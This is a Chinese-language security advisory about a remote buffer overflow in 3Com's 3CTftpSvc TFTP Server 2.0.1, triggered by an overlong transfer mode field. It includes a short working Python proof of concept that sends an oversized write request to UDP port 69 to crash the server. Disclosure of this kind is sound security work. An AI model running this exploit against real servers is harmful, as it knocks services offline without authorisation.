3Com TFTP超长传输模式字段远程缓冲区溢出漏洞
发布日期:2006-11-27
更新日期:2006-11-29
受影响系统:3Com 3CTftpSvc TFTP Server 2.0.1
描述:
BUGTRAQ ID:
21301
3CTftpSvc是一款Windows 9x/NT/XP平台下的TFTP服务器,实现TFTPv2协议。
3CTftpSvc在处理超长畸形的请求时存在漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
3CTftpSvc TFTP服务器在处理传送给GET或PUT命令的超长传输模式(大于470字节)时存在缓冲区溢出。如果攻击者向服务器发送了特制报文请求的话就会触发这个漏洞,导致拒绝服务或执行任意指令。
<*来源:Liu Qixu (
liuqx@nipc.org.cn)
链接:
http://secunia.com/advisories/23113/
http://marc.theaimsgroup.com/?l=bugtraq&m=116465920720302&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
# Buffer Overflow (Long transporting mode) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC
import socket
import sys
host = '192.168.1.11'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = "A"
mode = "netascii" + "A" * 469
da = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(da, (host, port))
建议:
厂商补丁:
3Com
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://support.3com.com/software/utilities_for_windows_32_bit.htm浏览次数:4455
严重程度:0(网友投票)